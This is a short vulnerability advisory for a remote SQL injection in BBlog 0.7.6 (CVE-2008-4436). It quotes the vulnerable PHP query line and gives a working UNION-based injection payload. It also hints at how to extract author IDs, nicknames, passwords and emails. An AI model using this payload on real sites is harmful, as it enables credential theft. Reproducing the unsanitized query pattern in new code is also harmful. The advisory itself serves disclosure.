|
|
| Details : SecurityAlert |
|
|
Topic : | BBlog 0.7.6 (mod) Remote SQL Injection Vulnerability
|
SecurityAlert : 4351
CVE : CVE-2008-4436
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Given : Yes
Credit : IP-Sh0k
Published : 07.10.2008
Affected Software : | bblog:wbblog:0.7.6 |
 Advisory Text : #######################################################
########## BBlog 0.7.6 SQL Injection Vuln #############
#######################################################
#
# Vulnpath: /bblog_plugins/builtin.help.php
#
# Vuln: if($_GET['mod']) $pluginrow = $bBlog->get_row("select * from
".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'");
#
#
#
# PoC:
?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors--
#
# help: On the number you can see you have to set:
# concat_ws(0x3a,id,nickname,password,email,icq)
#
#
# Found by: IP-Sh0k
#######################################################
References :
http://www.securityfocus.com/bid/30658
http://www.milw0rm.com/exploits/6233
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|